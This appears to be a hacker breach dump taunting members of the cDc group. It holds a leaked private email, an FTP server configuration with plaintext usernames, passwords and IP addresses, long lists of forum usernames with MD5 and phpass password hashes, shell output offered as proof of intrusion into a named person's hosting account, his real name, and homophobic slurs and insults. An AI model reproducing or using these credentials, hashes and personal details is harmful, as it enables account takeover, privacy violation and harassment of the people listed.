cDc book to pay for it, I'll buy some -to consign in local bookstores. Also, maybe do the -amazon-listing-thing (apparently, you have to manage your own -inventory to do that, at least, if I'm understanding it correctly). -I'd also like to get copies into the local libraries, not sure how to -go about doing that. It'd be kind of fun(ny), though. Thanks for the -insight into lulu; I'm pretty happy with the one copy I got (though -there were errors in it -- my fault, not theirs -- that have since -been corrected...I guess that's the point of a "preview copy"...and -hey, now my copy is a collectors' item, since it's got errors. Hah). - -> I haven't figured out a good way around their royalty rates for people -> either, unless like you said I order a bunch of copies and then ship them -> out to people. Still, that'd be cheaper for them to pay for the book and -> priority shipping. I dunno. I guess this is where a marketing plan would -> have come in handy. I also need to get a crash course in PR writing and -> submit something about the book to some online PR sites as well as a few -> newspapers. - -Did DaYuM help you with the PR stuff? I saw that you'd asked her to -on the forum, but I can't recall if she replied. Good idea on selling -the stuff royalty-free to friends and such (eliminating the royalty -before the public release); I've sold 15 copies to cDc people, not -bad. I'd have expected a few more, but money's tight for a lot of -people, definitely understandable. - -> I don't know how much you messed with b0m, but the drop down menu pulls text -> from standalone .txt files and imports them into the program. I think that's -> what Mixter/Ratte were talking about wanting that Google app to be able to -> do. We could offer packs of .txt files with the latest "h0t hack3r qu3ries" -> that people could download and unzip (and of course write and share their -> own). I already have the drop-down code and the web query code from b0m, all -> I have to do is get them working in a new stand alone app. I'm thinking -> it'll be ugly, but working by cob tomorrow. - -I like your google app concept; Mixter seemed to dig it, too, though -you're right that it's geared toward a single platform. Still, it's -good work that could/should be used somehow, I think. - -Take care, man. How'd the book release at OVGE go? - -Sorry again for the lateness of the reply. - --steev - - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -FTPD deets: - - -[Flack] -Login=Flack -Pass=patrick -EnableGroup=1 -GroupName=God -Home-Ip=192.168.1.2 -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=473 -Stat_LastLogin=3/28/2008 2:51:37 PM -Stat_LastIP=162.58.0.232 -Stat_KBUp=321389827 -Stat_KBDown=9362540921 -Stat_FilesUp=624 -Stat_FilesDown=3256 -Stat_FailedUp=0 -Stat_FailedDown=48 - -[Justin] -Login=Flack2 -Pass=patrick -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=20 -Stat_LastLogin=11/9/2007 1:57:58 PM -Stat_LastIP=162.58.0.232 -Stat_KBUp=63636702 -Stat_KBDown=486982 -Stat_FilesUp=4 -Stat_FilesDown=2 -Stat_FailedUp=0 -Stat_FailedDown=0 - -[TStranger] -Login=TStranger -Pass=Nikki -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=85 -Stat_LastLogin=7/13/2007 8:25:42 PM -Stat_LastIP=68.97.146.63 -Stat_KBUp=144077241 -Stat_KBDown=477431220 -Stat_FilesUp=27 -Stat_FilesDown=47 -Stat_FailedUp=0 -Stat_FailedDown=11 - -[hardwire] -Login=hardwire -Pass=nether437 -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=4 -Stat_LastLogin=11/24/2006 2:30:13 PM -Stat_LastIP=206.58.177.232 -Stat_KBUp=0 -Stat_KBDown=163 -Stat_FilesUp=0 -Stat_FilesDown=2 -Stat_FailedUp=0 -Stat_FailedDown=0 - -[gratte] -Login=gratte -Pass=dump2389 -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=2 -Stat_LastLogin=11/30/2006 9:43:25 AM -Stat_LastIP=66.65.10.45 -Stat_KBUp=0 -Stat_KBDown=0 -Stat_FilesUp=0 -Stat_FilesDown=0 -Stat_FailedUp=0 -Stat_FailedDown=0 - -[k8track] -Login=k8track -Pass=m00n -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=47 -Stat_LastLogin=1/7/2007 4:52:24 PM -Stat_LastIP=64.6.6.13 -Stat_KBUp=80716217 -Stat_KBDown=5800395 -Stat_FilesUp=17 -Stat_FilesDown=4 -Stat_FailedUp=0 -Stat_FailedDown=0 - -[Jeff] -Login=Jeff -Pass=Martin -EnableGroup=1 -GroupName=General -Home-Ip=-= All IP Homes =- -RelativePath=1 -TimeOut=600 -MaxConPerIp=1 -MaxUsers=0 -RatioMethod=0 -RatioUp=1 -RatioDown=1 -RatioCredit=0 -MaxSpeedRcv=512 -MaxSpeedSnd=512 -QuotaCurrent=0 -QuotaMax=0 -DefaultGroupRatioCredit=0 -DefaultGroupQuotaCredit=0 -UseGroupHomeDir=1 -Stat_Login=95 -Stat_LastLogin=3/19/2008 12:55:57 PM -Stat_LastIP=66.210.175.13 -Stat_KBUp=80716217 -Stat_KBDown=5565827658 -Stat_FilesUp=17 -Stat_FilesDown=515 -Stat_FailedUp=0 -Stat_FailedDown=3 - - -~~~~~~~~~~~~~~~~~~~~~~~~~ - -NSF raw MD5 hashes: - -Devolish:fbe1f0501c204002b9d7142488265e5f -MiB:d1a7217ac0e3ca2f6091c2c8b1402cca -phrenchtoast:8bd2e98ec745609d79f88fbcdc0c7f23 -Trammel:87c4456c84817d9ddbbca21197a0bf88 -Punkle Jones:536acd279c5c4026cbf879cb49219698 -screv:1c80b2601f88693548ccd6283b2fca99 -lowlux:1c9f88e9d5186a76b666ed76c6b091c7 -Omnininja:9651e75fcf0230ec8efd44a8d054c306 -nihilism:5297b609864f97c7386aa4adf47e7e40 -steak:82ed9a171f05becf2d09172a2f1d4df3 -hardwire:952b4f7dab17414b330e4941a1c34462 -Major_Small:09898d9f210469f08b99794d47bc3a1a -Howard Campbell 3rd:de4d58c16c5488a5fffdbf695d58ffae -cubicidal:5a214094707e2bb4c915a0459023fe59 -talonprime:bb52aeb112dec1f523b47e0b1be60aed -xenix:431a219e2a2bfb93857d3f1c0d40dbf2 -darksorcerer:7dbe350f63919c242007d455c094251c -oxycolton:066e35354d1a9a729479ffee44f05daf -schlupfer:109d5e38c400f421c7d5a8ad5c320b15 -hunter:bed869f4237e8700d9ab3521bfc70cdf -Mitt3ns:df745a6ecc79adb85f58b55dc66bdd3b -Shakari_of_Enoch:635bbb5fbbebd2e77678443126e746b9 -ripcord:ddb3a75a776b19d40d68421b2eeb0756 -DarkPontifex:6122387924f61e2f44bc627c576762f9 -olithena:d75325dff333e149fbc12a2b8c531b9d -Moti:cde4ccc78c7d29a5710ebcf0a1b681e1 -HaCkEr.kiz:e76828a45aa7748502704433c7678f68 -tony_young:0ac337243a30e3d6d07913e46f138716 -Exodus:a396e35895858ebb7367f65a66d90548 -hexcrasher:68ea15b259f94cab900ee420ea87d1ea -Deinoccocus:9de8ec392132849da693fd5fdcde5be4 -transend:42a53c990a1075e82a61bf0a7a5ac812 -nuclear_winter:2d138b1861c72a626452aef32f2b0e1a -Ctathos:cb00b6cfbd0a4f89dfe101a27c80c77d -iwantoknow:2c404b2a96dd6e40ee170c3ed4951ee6 -nFerno:7b16547cfa4b3a34e6401589b8f67455 -andy3ch:419b85ee3234ff42954c07310872b17d -five:ad198a36c4a282982870e3e2e65ae3c6 -KEMiKAL:d494b7788e74004e90c12d26f78b7058 -Brok3n:917fc6dbbaa51fa83fc5a0070a9f850b -widespreadruin:96cf1cbaf686d1e48f570706870bad4d -ibile:668421a140f4cee5b002087b08c235b1 -benja:4794ce10621d738fd4375ee826dd7472 -Gareth:b6f622cbd668c9682b71c2e1f7843e5a -laura_glow:1765a35c6d16065c968e87afead5208c -lordm:1c7d58cc6732c89d2513de45940f26c7 -djcromag:0403aa1d018168ea21151d22f16dfc13 -yaali:e381b8ea716b7b7ad8add7c737297d3e -dalqua:3886ed79102dc89f1cc2aa1f57bada94 -lasrever:db9f2814ceae82b68b18c5ad8f001fb3 -NewYorkCityDJ1:60923b534bd6546d6c6ae3919bd098ee -linuxcrazyman:a78c624a7ebb82c07711bb9c4c1a301e -standalonecomplex:8499308f5e8b630be3cd27f30c924c48 -NetV1rus:cbeb887e56773c34f74a2092d4b0f308 -Lawlcakez:7a3e670783c1e6fc9c09bc1caf1acfe9 -cyber_knight:b76e0a74ae427786fe8cdbdf75288042 -Mephistopheles:fca9ba352c162742b224f59cedf481e1 -ax3m0:0f920c47ca003e787ee069f7e587fda1 -putney3000:aa17e6b0aeff8b95b43aac9c489e3125 -raniendu:8141858e20626ae6d76467dac42e9d1b -nudge:6326a270e4f3e7746ae472467e622a60 -xero:bda4a1c0a6a7011e39e8064d85003941 -MbK:d07c8597fd507336e8cc14682a634cd4 -olorin:2badeeac1797cf7e4f95ca3115597581 -_spartan:9ff03b95d695199d19af7c1a585ddffb -synspectre:f14948b8e75da7aef17cd756539eeda6 -h0llyw00d:2fa3142377a4210181fd609990097a8a -myserver:4a5bcd3ce81f23bda3cd36c9cc6f3235 -psg:9ed851db5650737490bfee13c673cba3 -XxNoobxX:1c9f2b92986527e7667d898021b7a9fb -spyrax fluxxeon:102651c4d82eef7e8662d3eaf41f153c -GreenDiamond:affc4cbaf7f9a56f836e9719e8825fa5 -fj:0a6731ab3ae186c7f4f853163a6b10c8 -jacksom cole:c150661e828cf06593e03696a03b19fc -darkrebel:264c217d0311480ff878022d93abb31c -flannigan:21d1163c25779ab3db7e32c7a26c0d50 -baesparza:38a85d96057ac7acc03c63bcc1fb6c13 -LordX2K:bcb34ec64a4a63e30070f749b4ba81fe -scaffer:8df26eff098354615f5bbea5441ea10c -Rubio2107:5135497d3d6377c263da4e49f5be5029 -benzle:8c23d760ce046c722e8b17a71fe09267 -miasma:f06d4be1ecb4ebc0652b1d43e694747b -dsfargeg:dc203b905e134d7e5fbfd562530ff52e -st3x:e9f1e0b13b8a60d76bd23d3e11f3de75 -Sid:47c8076b51844b2a18e615ef4fe49830 -pcottage7:2f8ec9432c222416aa4686c2e79780d2 -MekerTT:f7e038bb9c5d5c98686a74ca29e3adc2 -FerebAA:80a0df36519f4fc671e8ce2631b9c4b7 -aldi_qdal:d60dd6673ed2b0d02160a4558f6ed9a2 -am_b_tz:50e80c6af2174520e638f3b13a72d223 -SuperZ:b55ee991d22e611b81ca761786301379 -_freestyle:f60a22f4f5d78c7cbc63b27bca67e232 -ad:6003d8c9cce8b8b5ff09ce81a7e474f4 -msnexploit:ef9b8457bf88dd2b07e320749a6f748a -anti_social_tiger:f5a01d80e0256156b530aec27804f8c1 -Sheikh:4685f65c8df8cfa1dd32e46b4b0eccf2 -BasekliN:ec4f3a11ffaac9e103a0fd09f4cf8518 -neobeautifulmind:62a3e0d1b63b9c4abb5b7971756ae4da -Morth:c055103810e2656ceeaf9df0c64b7f1a -BritneNude:50a1243edf116d0c807baab33acb22bc -gawbul:3de71aa30d86b295af0df2ba1c122d29 -cultepoaeqw:e42c2506eea688dec98d88689bdf3df7 -TKS:f1a81d782dea6a19bdca383bffe68452 -R. C. Hoagland:d57784cffb28277368183d130a7ef225 -thedarklord416:2d7e2e880f599d13d109ed3bfd047bdb -Beltane:3a5000697fc605de8b8254be460d39bb -StivRichardOff:e229f01897c118d4fe4830634109c185 -Wimmig:0618e0da206850db9b9c4a6254c3e1df -Cyborg92:4a1689ad1dcc961a580ea452e47a33cb -mindless_hero:d5be03aa45ce98956c18aaab59776c11 -Captain Ahab:0a17d47a4d82d942a02b5e388c61b2ff -mangara:7c3a932f3f321164f859b9c982167264 -circuitbomb:3887ceec536f943a17dff73ccc329e21 -Chryse_:ca1ce912df622761c6dd208719b85fec -Arkmuda:b639bffbbff3d29f5d918d5d157dcd95 -viriimind:dd0d99271efd5953f5f08a835d91b88f -l0stk0z:d96672d9712844796146a5fd87169691 -myharry1:0cc2a70bc23db246ebc8de97f2fbe4ac -Delmarbbq:cc1b10bafb83ff5867b2404eaaea1329 -uropian:b5eba7e00737a0cc5c0aadb3f4ec5ff3 -SamPlesure:be7cc4a03de3e02131f09bd081375481 -vioxis:3de1f42a4667e30d4057f7b36384687a -plier33:ab9f1ca4b258657b136f2f1ace336d68 -Shikaka:e1461a8b5523e5fc7cb632c1edd94c42 -DJ Stryker:1a9e3329a0bb826c3f7c5e20bc62a675 -zerwell:b7f34577bc3f6a74da3262185f1f34f3 -Tellerseife:759a04bdae8af7a430e2005c6bcea9cb -Diana:e9653b075e8ec03dab610bdd8cdaa71d -Deana:b391a6e22b6b5e472597f4375f36bb7d -Cyberian:5a1190484159ae260abfa08f96f9e2f9 -DEDADO:dccc5a281d98ef1da67fa55e9def42c9 -Gambler:de6f5990aa28995d9ccb71764833e7d8 -SSL_Gambler:29747ca6a2f83a19222bcf7f1a312133 -Rogle:215d9a90497a5391f93e4d64d7e40889 -teque:f6df47c89653e878697ec5b4319b1533 -stoli:f7b44cfafd5c52223d5498196c8a2e7b -diskrez:e129e4e91de907c564af8a1024df5f96 -SeruZ:08c8fb489258aa15238ac9fe4951d25b -SPL:ea8315b618f219ceba5f2bd5c70417d2 -xcomplicated:97e21fa8cc268946de7aad6127a06746 -Draconian:f0f98ae59fe2529d96a5adc2600302ba -Enix:35609e82460c65dc96778eee7845621f -GrayRivs:88610e444b84baf86db0a25f5463bba3 -spacem0nkey:8f503879e4827584b818ba5abc6884b9 -Ghost_Who_Walks:8f233ec2b650159be2f3303cf8ba7796 -saddamned:6001325f61243427dc59a52f9fb49b5e -xdfsd45oi:2c936c4d20be78b51283efc35bda2fd2 -prescot:418ba2cf77b5a7278bf1f939d2e27aaa -illusions29i:5676d6daaae6bebf815900ef9ab6f217 -faiyya:5eb909ea83a0a93c7f51746112b24e3f -Kirai:261ce62bc466dc4d8dd7f5e2468a1486 -kenkills:e9c732b6b5cad1baf187e8839ee7f8d0 -Hekk:d2378132ec234003ea54a5fbbf8b2d6e -fretyborsev:ffe5004f3d37e6e7a846ac9ffc23f1f1 -0ptix:fe3c3a28951f77f751b972509b0399c9 -ComradeSmack:566878e0be809a762ba96ae555669237 -buy tramadol:765ac7c7f90f5e2cbb62753f9d92aa0e -wtoredujel:80218dde7083f9c5b3120bbec35eeceb -Viagra Online:2df4455558508b94b2411639570dbd07 -Phentermine:4d94a9a974038114d45319a0cdccd815 -Fulcrum9:24ac2aa62eab411429ffa7613ed50bc8 -eye:f30115fcba8a0bc167c0d4ce3f7196f0 -juan cux:0636e9fdd8cc88ba68088febbb449cb8 -McPille:8c4b1157cb6f8884aa183ac0f1447e6c -Breaker_Byte:ee7fac286c16be2f77c1528ceaaeeb70 -tonyktomyk:4951ee7a6399f1fba9fc5e09646b3cda -Jenna_Sindy:308cd81bfd772f2fabc99e4244150ca7 -lopturexzed:cd26b85eca7bd7cb029b00a0e8b6fcd5 -sdujoplino:4e49a8f624c57ec589f0b7f1294ca408 -hardwyrd:c60afd32c0ad335763f00411aba990b4 -Cyberjedi:5eb59a1c45ec8d0eafe705c45aa15ce1 -byzeg:3358941c69cd6b9bcbf15a48493385eb -gawar_mecca:5df0032ba1e186b155f46b709f8e5eb5 -taake_mecca:abe691712b2842550688279dea9501ea -nytrokloper:58c47b3aac674a01d30ce078dc1caaee -pwnd:969aa6a9508056b15c5b8118e646481a -gerdyronks:5118d372247da4cd1f1cd787615086ed -lusdyronks:f5687e466e2e9ab747f1b144fe02da4c -brovdeks:eaef04a47e6a549d99a4524d4bbafafc -chikamaru777:b749d81b697ca1c5e05778e43f00f96e -portjassica:b88c5f6bc4aaf3b2afa0784091abf7b1 -ireneaveline:c22a852534acee8f12bddf7484b05940 -Klaxon:287e9593819b2fcdf9945e7ccacd637d -evellineiris:687af2e5e16a80b2e3bb9cc4630f6166 -nack3d:f9ead7025db992717821212777d95688 -bit_master:b73a26125e3cadec4d7c0f788b7c841b -casino:992a8325b63263e0f25e23181b58a747 -BotRodInyourass:d0dc1a4859e622e9647aadd08faddf34 -xVxWHIPLASHxVx:6822c178887feb484b89f1a4ee513035 -sentonuto:57e83bf927e9fa11a7bd89cc0b85f216 -GrahamPhisher:99b226f539e79699b03f2bc2825944d3 -Loucetios:a96d31080b33dc073c35b7ad905d81a6 -dcd:bf5731997dc1fd7f13c18bc0c106511e -ian gray:ac42f9a7207786f2f591228641e01371 -HAL:10d06ba6179c1e59f52587238563ea57 -Playa Of Da Day:ffc2d324f9056827e736b3e996ee7776 -hacker2008:d9fe1c94ff1cc88dbbf38058b5eb3bd7 -amcfadin:304eab0fefbb23537771f885ce4636ec -xlectric:244bc5e839b659af69ffebc0d74eb92b -pipe:4a7154bfe2b9e4b0da49ca477d3c10bb -NR_pipe:1742c6f3afa6d932748d975df800dde0 -phoenix_rising:0d3017fe8a9dced448514518852c527b -RichardR:1593414a150ebb0904429f75edb304f6 -jaydee:e1b967d3a57b643f8eb498f59d2eea5f -Windoze:6609a4ebb2e2195d6878bcde896a104e -A30N:7cd8273fe5e34f948c20723128fe59bb -kiqina:b9105746147c1e65a9eaf8685a3c209c -mike:7ed2d67c014b2f88e0be8f585780b364 -mathanbk:13caa34130e0d06ef341475800967eb9 -SotSpotly:ef4e8865bf65539f2a69e10ce147edaa -comityhack:fe642d03fdf285c1b283e534e90bd236 -sphinix:87a883ca686a8f9a4bee57a7de39e078 -de.sphinix:659290e587bc401d79e67505be492d28 -hektor77:eedac7a24c3bf05932d6367d7e27cc7e -StromShifter:473316e9fd02092a069c941303131371 -SLR:b042d666c68228ecd00e1efc21a90ca1 -JdogZ:43883983a5386d1663af5f9e8dac5be1 -FedyEduffmife:286743de5d19cf1148a58ba6fe6d09d9 -Namrah:8ff30af33e32f773d2cd2d2c958cc054 -MontadaWewMen:b24de37ef968ae3310e1a5a6a67e8242 -bwaha_the_mad_genius:895a5d4f62299037294e83374de1394b -filesearch:206b7299ad2796dd685b5c910bc6bd5b -Anamoly:f0c8984db8c0bfffe720938d3b115531 -RedBeret:eede15ed9c53521079b0d0496b58791d -Pierhareejode:8c8561304f7a300762d9220d252238b3 -sarxinst:948cef17c27cbb8c59fb224f8b7f431b -cybeldia:407b87ae4378b7303ff70543bc8f001e -MysTeRiOuS:e4682110b5028c11950ffcc907d08126 -Legionair:26dbbefc9cceac59c2911c3af27be37f -Phrozen:b435e8b43fff6d98f4cea82495ee52c4 -J4Pa:38f08b676247034b1edfcd3e329c227e -Morphell:f5413a813853af2fd2cf59ff7def7e2f -L4n_D3stro3r:4ebb006da4618596f6100316da3782ae -rapidshare1:4f613d99d0c9998cda40d383f1b3eaad -3N1GM4:ca0f803ce83bbe5913986596bbe0620f -Christie:74c67ea2f5a448482e9f9f7e052d541a -ringtones1:f7cf16e038932f925b69f27b7c2dbd89 -Cloz:a673739818b3fb77aeff174c7237c982 -negdlihcssirhc:542017da411e88d422a25fd22114a842 -miraving:ae0b536052cbba8516b725171938b3d2 -alinagromoniecka:eccdcbfadf5ac4b50563a45df2b53eb3 -obnoxice:0e4b779f765b353bd537e8ee5dabde6e -lojomop:cab84d39a3e7bd1818e36afc475831e2 -mzer0:33986e57f3d410687a29d387c6b79bb4 -M3f:683cf9fd64c941b3c28b33e3fd8ab245 -Hawk:abfbed562cc4a34b0869d1d54e298d85 -xxl:0b76add455b3553ba3e6d37305222104 -ksycht:33607ca224c4c227e396419da6195d67 -gomosopions:c6afafe554d0b415d32579f51c4bc4c3 -TimeChronix:e03b5ef233574fd3c4e831e0bcad55fe -python:53f91eb23a687f4db9b49c42d760a407 -Shrap:142d116df8520960994b72777e453ace -voidsessi0n:062afdb2ad00426fd9e6ce7db8507eb4 -lyc4n:098fd77351008d92368ceff8e6ddd086 -petarsubotic:ebc979d10ae4be2a90c4c3e650c20b01 -Quollaniodo:e6fa805d8c1ea8d47bab19569304955c -twidewelf:8707219ab754422aefc6d4bf44dc85dc -Fardewrab:4e3e404d263f8f34ed647ee1427738eb -Janbrokesronn:b85e1a00df8fa21347d26079bf3c8894 -musselman69:456f86747967ce3cdc6338a4218e8f01 -youlot:a394c08aa03274146c9cfb872276932f -Phovieselielo:4f3c72e7df2ebf2d6bb13b62c759f5dc -cainen:52e90e56c300f1d2ac37ec6f521a51da -myBoxfy:5899c3b1b96d61510f51118096d90a87 -9to5clone:cdcc521680f788ce572c72e65e7bcd27 -tolopoj:24480ce8ccedc7e3ba586ccfdaefe084 -painvancy:1035f6695f84535aee2070a0e17e13f2 -Smooth69er:68ea62a73d73d63eee9715eeb9d8d7c2 -Riot:683237f9a5992d9cca6b1e2d954fbdf7 -RI0T:ac48e80fc98070d86c33155f761ecb0a -MasterNinja666@:5267df8d50fd823c5a80a8aefa8f97d8 -Neko-Kun:040b77a8be248f3b05c312c553daa742 -DarkendHeart:f34039d579a8c25d26a80b15b637daed -palmada:4daba13a8054ad584972d5df21f31d58 -spuddups:09be3184d7aaa0f5ea2e7b24affdf542 -Doomassassin:6af249e7f8dd8a39ae4640a647d7b64b -hardboiled:ec856259c48e18e89109f8264d4b946d -j4va:034894f3fd6602316b506fcfd61921dc -Cainr:88c1bc7be8968cbdfbaf41dc950b6264 -dave:cc32071d725b0de69564ee5ebf3d3d35 -cyrus104:26a5dfb4c49d6556fe32cab7a3a2e216 -GectGeodo72:b1fa2d0ec149847814626d2cc518fbeb -schwartzkopf07:bb03e0cfa71a6f9ea17eecd2b6a62eb4 -adultdatingplus:d616afab0a7f34b9b75cf793d353f955 -acokanthera:c175ce66cde24c20ebc6dec62853f452 -gillam:a229c0f1f33fe258b891ca183bbebfb9 -Clone:6367efe45fca0bf499a51fb86a04a441 -attaipurb:80d678421858bfaded59bf9fe20a8c33 -Jeremy97:fa3c45dbc7d48e24dfb7b2ecbbb1e0b4 -p3zz:26242e1fa59b4fe7e5e50af6909f1e1b -szubi122:7d29c2495278e9609ebe464d91c9de88 -sizeaspem:5d107535225ba6d2e61a65287dd7e67f -Parkerw207:6f8b1bb39501aac8eee0516e4299f13c -parkerw2077:7873289b36590a14baafedf92117a3e7 - -NSF phpass hashes (we wrote a cracker for this but obviously it's slow as -shit): - -admin:$P$BviUeSfCipChNKr7A3lLwusSk0qS1W/ -Myles Long:$P$BQ0J3AF/sPHtcCh21dX2YA.ITGz56V/ -Elliot Pank:$P$BS6Bwo5Bb9WmmOJDctq/2jp8k5upxt/ -Masterslip:$P$BkVhLpHxfzJBsyHLqzTj2upPVLrGuJ/ -ekimike:$P$Bp8YYf84i1yuQ7ldPlRSR6IOayR7Np. -charlesbabbage:$P$ByNdwncZJ.bDxHucOmzxtvcp8mbzxu/ -sM10:$P$BiOfLKVtrY5MR/Mz9eO1HXPbPITgGU/ -z3r0_co01:$P$BuoWQTR6UFIsDvSq6.x9xrD6D8SA.Q/ -darkmalice:$P$BjFDOWz/0/XlsB4UZtfbPAnYdxnPLF0 -force-unleashed:$P$BK4ZUuY4UoLTzc4EuVk6I1ru4rrDrv/ -herrek:$P$Byj25/1sdfQmEvQvR1oj/Zav8KY1Ek/ -z3r0co01:$P$BE9KHP01pJm7IHpsCO25qNyy7lI13J1 -photoabc:$P$BHfcImk4n0Vc9RRAxYKoo2Lu8NgXXP1 -muditjames:$P$B8oGioLzv4B607UJnw1IqbKCR0PzNE. -kingpin:$P$BCU39G5KbzWjYlanPbkTsslZj3lHXT0 -testing:$P$BSoUGyz11rBx9i6kBiBo9Owj22F5Ul1 -krasallcom:$P$B49UMPw1LWTn67bu9n1L40o.2amWli1 -admin11:$P$BN1RKC0sVcFdBQ5T3z.a6q/g6MGMrI/ -krvrlinek:$P$BdXhGoU077uhPTbtw.xYwxBaZcULAg1 - -Flack, why do you insist on aligning yourself with these faggots, playing the -hacker game, and also storing your home videos on your host? We could have -quite easily released them. We know you ain't no hacker. Do us and yourself a -favour and get out of this circlejerk. - -Superheroes > Ninjas. - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -Oxblood Ruffin. Legendary hacker, leader to thousands, the mind behind the hardcore political -movement HACKTIVISMO, the man so many young kids aspire to be. Or not. Laird Brown, as he is -better known to his friends (reporters), is a shmuck. He is nothing but a gobshite. Running his -mouth around the internet bigging up cDc, his lame hacktivismo and let's not forget his blogs. -You see, CDC have this thing, they tell hackers that they are not hackers, but then they tell -the media that they are. To some extent I believe Ratte about this, but then why have this -faggot Oxblood run around talking about sec related stuff that he knows nothing about. - -"About The Author - -Oxblood Ruffin is a member of the CULT OF THE DEAD COW (cDc) and Executive Director of Hacktivismo. -He uses technology to improve human rights. Oxblood wrote the -Hactivismo Declaration and co-aurthored the Hacktivismo Enhanced-Source Software License Agreement -(HESSLA)." - -^ wtf, i think my description is better. I mean he makes it sound like he is the internet's Martin -Luther King Jr. - - -Anyway, yeah..we owned him, here's his shit. - -$ uname -a; id -FreeBSD gilford.textdrive.com 5.5-PRERELEASE FreeBSD 5.5-PRERELEASE #0: Tue Mar 28 11:28:25 GMT -2006 root@gilford.textdrive.com:/usr/obj/usr/src/sys/Text5S -i386 -uid=1050(lairdbrown) gid=1047(lairdbrown) groups=1047(lairdbrown) -$ ls -la /home/lairdbrown/ -total 108 -drwxr-x--x 12 lairdbrown lairdbrown 512 Aug 25 2006 . -drwxr-x--x 726 root wheel 14336 Apr 1 11:16 .. --rwxr-xr-x 1 lairdbrown lairdbrown 771 Jun 24 2005 .cshrc --rwxr-xr-x 1 lairdbrown lairdbrown 166 Jun 24 2005 .forward --rwxr-xr-x 1 lairdbrown lairdbrown 255 Jun 24 2005 .login --rwxr-xr-x 1 lairdbrown lairdbrown 165 Jun 24 2005 .login_conf --rwxr-xr-x 1 lairdbrown lairdbrown 371 Jun 24 2005 .mail_aliases --rwxr-xr-x 1 lairdbrown lairdbrown 331 Jun 24 2005 .mailrc --rwxr-xr-x 1 lairdbrown lairdbrown 1605 Jun 24 2005 .procmailrc --rwxr-xr-x 1 lairdbrown lairdbrown 801 Jun 24 2005 .profile --rwxr-xr-x 1 lairdbrown lairdbrown 852 Jun 24 2005 .shrc -drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 .ssh -drwxr-xr-x 3 lairdbrown lairdbrown 512 Aug 25 2006 .usermin -drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 Maildir -drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 cgi-bin -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 etc -drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 homes -drwxr-xr-x 2 lairdbrown lairdbrown 1024 May 6 00:20 logs -drwxr-xr-x 2 lairdbrown lairdbrown 512 Dec 18 2006 php-fastcgi -drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 svn -drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 web -$ ls -la /home/lairdbrown/web/public/ -total 60 -drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 . -drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 .. --rw-r--r-- 1 lairdbrown lairdbrown 318 Nov 13 2005 .htaccess --r--r--r-- 1 root lairdbrown 89 Aug 27 2006 .textdrive --rw-r--r-- 1 lairdbrown lairdbrown 6660 Dec 29 2005 HISTORY.txt --rw-r--r-- 1 lairdbrown lairdbrown 1384 Dec 29 2005 README.txt -drwxr-xr-x 4 lairdbrown lairdbrown 512 Jun 24 2005 _ical -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 files -drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 images --rw-r--r-- 1 lairdbrown lairdbrown 845 Aug 26 2005 index.php 